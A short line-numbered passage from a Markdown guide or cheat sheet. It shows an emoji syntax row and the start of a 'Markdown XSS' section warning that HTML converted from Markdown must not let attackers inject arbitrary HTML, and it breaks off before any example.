| 42 | | Emoji! 😀 | `Emoji! :grinning:` | 43 | 44 | ## Markdown XSS 45 | 46 | Markdown often gets compiled to HTML to be styled with CSS later. When converting something to HTML you need to make sure attackers can't inject arbitrary HTML, like `